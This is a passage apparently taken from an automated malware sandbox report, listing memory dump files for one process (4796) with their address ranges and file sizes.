                                                                                                                                                                                                            5.9MB

                                                                                                                                                                                                          • memory/4796-200-0x00007FFEADF90000-0x00007FFEAE048000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            736KB

                                                                                                                                                                                                          • memory/4796-207-0x00007FFEBE690000-0x00007FFEBE6A9000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            100KB

                                                                                                                                                                                                          • memory/4796-208-0x00007FFEADAF0000-0x00007FFEADC0C000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            1.1MB

                                                                                                                                                                                                          • memory/4796-205-0x00007FFEB0010000-0x00007FFEB003D000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            180KB

                                                                                                                                                                                                          • memory/4796-206-0x00007FFEBE280000-0x00007FFEBE28D000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            52KB

                                                                                                                                                                                                          • memory/4796-204-0x00007FFEB60A0000-0x00007FFEB60B4000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            80KB

                                                                                                                                                                                                          • memory/4796-201-0x00007FFEADC10000-0x00007FFEADF85000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            3.5MB

                                                                                                                                                                                                          • memory/4796-202-0x00000158C4440000-0x00000158C47B5000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            3.5MB

                                                                                                                                                                                                          • memory/4796-203-0x00007FFEBAB70000-0x00007FFEBAB94000-memory.dmp

                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            144KB